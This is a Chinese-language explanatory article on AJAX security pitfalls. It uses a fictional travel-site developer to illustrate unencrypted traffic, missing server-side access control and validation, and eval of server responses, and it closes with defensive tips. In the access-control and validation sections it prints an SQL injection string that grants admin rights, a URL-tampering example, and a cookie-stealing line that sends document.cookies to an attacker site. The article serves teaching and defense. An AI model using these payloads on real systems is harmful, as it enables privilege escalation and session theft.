談談AJAX的安全性及AJAX安全隱患

　　Web開發人員不會注意到由 “AJAX（Asynchronous JavaScript And XML）”所帶來的激情。不費力氣就能建立像Google Suggest那樣的智能網站或者像Gmail那樣基於Web的應用程式，這在很大程度上要歸功於這種技術。然而，伴隨著AJAX應用程式的發展，我們發現了它的一些不足之處，我們發現它的安全性漏洞也在逐漸層大，就像慢慢地把基於AJAX的網站放入了一顆定時炸彈中。

[被屏蔽廣告]　　AJAX的好處

　　在當年“Web應用程式”的美好時代，事情非常簡單。你填寫了一個表單，點擊“提交”按鈕，然後當前螢幕就消失了，等待一小會兒後你就轉入到了下一個頁面。今天的狀況已經不是這樣的了，使用者需要的是一種就像任何傳統型應用程式那樣流暢、快捷和人性化的Web體驗。

　　AJAX經常是和DHTML（Dynamic HTML）一起協作的，它的順利執行需要允許網頁中的JavaScript代碼和web伺服器在後台無縫通訊。比方說，當你開始在Google Suggest的搜尋方塊中輸入東西時，web頁面就和伺服器在後台開始交換資料，然後會給出一些你可能需要的詞條等。所有的這一切都不需要頁面重新整理或者按下任何按鈕。同樣這也就是像Gmail那樣的應用程式怎麼能對即時拼字檢查做的那麼好的原因。

　　AJAX怎樣工作

　　AJAX複雜的原理已經超出了今天所要闡述的範圍，這裡只簡單描述一下。你的頁面上的JavaScript代碼能夠在不依賴於使用者的情況下和你的Web伺服器取得聯絡。這裡面起核心作用的就是JavaScript的XMLHttpRequest對象，這個對象能夠被就像使用者敲擊鍵盤或者時鐘事件在後台或者非同步觸發（也就是術語非同步JavaScript和XML）。

　　如果你在Google Suggest中輸入“ajax”後，就會得到像我輸入後得到的伺服器請求一樣：

　　1. www.google.com/complete/search?hl=en&js=true&qu=aj
　　2. www.google.com/complete/search?hl=en&js=true&qu=aja
　　3. www.google.com/complete/search?hl=en&js=true&qu=ajax

　　在這個術語中的XML部分有一點會引起人們的誤解，其實這一部分是沒有任何意義的。它是從JavaScript對象得來的名字，同時許多AJAX風格的應用程式使用了XML，這個對象能夠就任何事務向伺服器發出一個請求。甚至JavaScript代碼本身也能夠被取回和評估。繼續完成我的輸入“ajax example”，將會從Google的伺服器產生下面的回應：
sendRPCDone(frameElement, "ajax example", new Array("ajax example", "ajax examples"), new Array("153,000 results", "177,000 results"), new Array(""));

　　這將會給你一些關於強大的AJAX的暗示吧，它具有在運行中（on the fly）把新的JavaScript代碼加入到瀏覽器中的能力。然而，最佳化的方法看起來好像束縛了XML協定。舉個例子說明一下，比如Google產生了下面的這個東西：

    ajax example
    153,000
    ajax examples
    177,000

　　顯然，你可以在一個合適的表單中解釋這些XML資料，但我們要感謝JavaScript，它確實能夠在一些非常典型的限制條件下和大量討厭的IE bug環境裡非常好的處理XML對象。

　　為了協助你理解一些Ajax的問題，我在這裡給你介紹一個假想的旅行公司－“時代尖端旅行公司”。由於受到AJAX bug的推動，他們的主要web開發人員Max Uptime為了建立一個這樣的應用程式，他決定混合使用AJAX，這樣，他走在時代尖端了。

 
　AJAX的問題

　　半數以上的AJAX安全風險來自隱含在伺服器中的漏洞。顯然，使用安全編碼技術的好的設計，對於更安全的AJAX大有協助，我們需要感謝Max熟悉開放全球資訊網應用安全計劃（the Open Web Application Security Project - OWASP）排名前十的最嚴重web應用程式安全性漏洞列表（www.owasp.org）。不幸的是，當Max實現AJAX的時候，他仍然需要面對許多額外的因素：

　　1.新的技術：如果Max想把他的網站串連到一個SQL資料庫，他在Google查到了數百萬的例子。AJAX技術，不管這種技術有多年輕，它仍然是出現在採購迴圈中相對較早的，儘管它只有很少一部分好的例子出現在網路上。為瞭解決一些難處理的和不必要的複雜問題，這就要求像Max那樣的開發人員去自主開發。Max也就不得不編寫伺服器端和用戶端的代碼，建立他自己不太確定的協議（特別是對伺服器響應來講）。不管這些協議有多好，都將會及時表現在頁面上。

　　2.非傳統方式的設計：AJAX有一點點不同於傳統設計方式，因為這樣的應用程式是半用戶端半服務端的。在Max的例子裡，他是唯一的開發人員，所以他為服務端和用戶端都能夠進行編碼。在同一時間使用兩種不同的語言（特別是在早期階段）進行開發將會產生一些初級的編碼錯誤，因為他要在兩端來回跳躍，對一端來講非常好，但可能在另一端不能夠勝任。即使Max有一個大的Team Dev，安全編碼責任也可能在服務端和用戶端開發小組之間代碼移交的時候發生問題。

　　3.太多的指令碼語言：Max憑藉他自己的聰明才智決定建立世界上最優秀的旅行登記工具。你從輸入你現在的位置（通過郵遞區號、電話區號或者GPS等等）開始登記，這時候一個AJAX請求就會被立即發送來確定你確切的位置。從那時候開始，螢幕上就會填入你所有可以利用的旅行方式，這一切甚至都是在你決定你想要去什麼地方、你打算什麼時候動身和你打算和誰一同去之前就完成的。

　　這個螢幕上的儲存格和控制項都充滿了AJAX驅動，伺服器端和用戶端的指令碼可能需要超過20個不同的伺服器調用。你可以想像一個很小的個體伺服器程式，比如findairportsbylocation.aspx 或者 determinemaxbaggageallowancebyairline.php.

　　顯而易見，如果沒有Max的仔細計劃（比如建立多功能的“重載”JavaScript函數和伺服器指令碼），每設計一次他都需要建立超過40個獨立的部分。更多的編程意味著會產生更多的錯誤和bug，意味著需要更多的時間去編寫、管理、測試和更新代碼。不僅如此，因為在用戶端的JavaScript代碼中應用了大量的這種指令碼，他們在正式的程式測試中也容易變得很健忘。

　　4.確定小部分的AJAX不會引起危害：這個網站是一個計划出行的網站，但是Max考慮的是它將立刻為你提供一個顯示精確位置的衛星視圖，並且把你所要到達目的地的天氣情況也提供給你。AJAX最大的誘惑之一看起來好像是直到最後一刻它還在進行其它的操作，就像一個講解員在那裡解說一樣，為了AJAX使用了AJAX。當Max開始嘗試他的新想法時，他會逐漸嘗試增加更多新的功能，完全忽視測試的需要。

　　5.不安全的通訊：每一個AJAX調用可能只回傳很少數量的資料給用戶端，但那些資料是私人的、保密的。Max可以編寫一個便利的工具來對你的信用卡號碼進行數字校正，但是如果使用純文字代替over SSL進行發送資料會怎樣呢？這是一個顯而易見的問題，但是當有許多例行程式需要考慮，特別是螢幕上其它99％的資料不是真正的機密資料時，很容易就會忽視掉SSL的。

　　6.伺服器端存取控制：使用JavaScript程式來觸發AJAX經常會掩飾一些顯而易見的編碼錯誤，伺服器端存取控制就是一個例子。假設Max想參考你上次遊覽的一個詳細目的地來為你提供你中意的旅館，他可能會是像下面這樣：
showprevioushotels.aspx?userid=12345&destination=UK

　　這當然是非常好的，但是如果一個惡意使用者把URL改成了如下所示該怎麼辦呢：
    showprevioushotels.aspx?userid=12346&destination=%

　　他們會得到其他人最喜愛的旅館嗎？（注意：％在SQL語句中是萬用字元）。無疑，這是一個沒有什麼危害的例子，但是Max應該使用session、cookie或者其它符號形式來確保資料能並且只能發送到正確的使用者那裡。它們可能僅僅是資料的一小部分，但它們可能就是最重要的一小部分。

　　7.伺服器端驗證：實際上這裡有兩個問題。第一，AJAX控制經常被用來在使用者最後提交到伺服器之前的輸入驗證。這麻痹了Max，使Max有一種虛假的安全感，原因是他建立了稱作alloweddestinations.php的函數，根據使用者的ID來決定他們能夠到達的正確目的地。

　　因為這是一個伺服器端的檢查，當這個頁面最後被提交的時候他不必再次為在伺服器上做檢查而煩惱，這裡我們假定不會有惡意的使用者暗中破壞從alloweddestinations.php的響應或者破壞對伺服器最後的請求。

　　AJAX控制可以比使用者自己更仔細驗證使用者的輸入，但是他們還是經常在伺服器上最後做一次驗證。

　　AJAX驗證的第二個問題就是控制本身會受到驗證漏洞的影響。這裡再次強調一下，URL通常是隱藏著的，所以也會經常忘掉它。舉例說明一下，也許我可以使用SQL Injection來對剛才的指令碼進行攻擊，如下所示：

　　showprevioushostels.aspx?userid='; update users set type='admin' where userid=12345;--

　　就會讓我登入後具有系統管理員的許可權。當然，如何取得那些表名（table）和欄位名已經超出了本文討論的範圍，但是你已經瞭解這種情況了，不是嗎？

　　8.用戶端驗證：我們已經知道在剛才的Google Suggest例子中，通過簡單評測服務端的響應後動態建立和執行JavaScript函數是可行的。如果沒有任何形式的驗證（如果這樣的話在用戶端很難保證可靠性和流暢性），用戶端將僅僅簡單執行伺服器需要它完成的事情。

　　這樣的話，由於真正的代碼怎麼執行的對於一個普通使用者來講是永遠看不到的（也就是說你不能夠“查看源檔案”），於是潛在地為惡意的駭客們開啟了一個完全的攻擊導向。如果伺服器的響應持續不斷地被搗亂（這種破壞行為可能是在Web伺服器本身也可能是在資料轉送過程中），這種攻擊將很難被發現。

　　Max使用下面的響應在目的地網頁上更新天氣表徵圖，他是用的函數是eval();函數：
    updateWeatherIcon('cloudy.gif');

　　然而，惡意的cracker能夠把這個函數變成下面的形式，這樣要發現這種攻擊就更加困難了：
    updateWeatherIcon('www.myhackingsite.ru/grab.aspx?c=' + document.cookies);     updateWeatherIcon('cloudy.gif');

　　我們現在能夠在我們自己的伺服器上跟蹤每一個使用者的session ID/cookie。
小結

　　毫無疑問，AJAX和AJAX-style技術都是通向web設計的光明大道。開發人員可以在web上創造出以前從所未有的真正的“應用程式”，使用AJAX必須小心謹慎，這樣才能夠保證web網站的安全。

　　然而，最大的威脅之一，來自日益複雜的使用AJAX的用戶端指令碼和伺服器端指令碼。這些指令碼被技術手段隱藏在了視線之外，使測試很不直觀；同時，這種新技術看起來也使web開發人員忘掉了基本的好的編碼方式。就像存取控制和輸入校正這樣的問題也不會消失，它們變得更多更複雜了。

　　5個最重要的AJAX安全提示：

　　為了取得成功，你必須從好的計劃開始。必須集中你的才智減少和簡化AJAX調用，建立一個標準的響應格式，在任何地方都要遵循這個協定（理想的XML）。

　　遵循來自像開放全球資訊網應用安全計劃那樣的網站的最優方法。這裡面特別包含了存取控制和輸入校正漏洞檢查，同時確保敏感資訊使用over SSL勝過使用普通文本。

　　永遠不要假設伺服器端AJAX對於存取控制或者使用者輸入校正檢查能夠代替在伺服器上的最終再檢查。增加AJAX控制永遠不會減少你的驗證工作量，它們只能增加你的工作量。

　　永遠不要假設用戶端的混淆技術（obfuscation，在這裡指使JavaScript難於閱讀和解碼）能夠保護你非常重要的商業秘密。使用JavaScript是隱藏程式設計最沒用的一種手段，還能夠為你的對手提供好處。

　　最後，你必須非常好的領導你的Team Dev。使用AJAX聽起來非常引人注目，但是你應該認識到要保留你的Team Dev以便開發版本2，當然現在你應該開發非常穩定的版本1。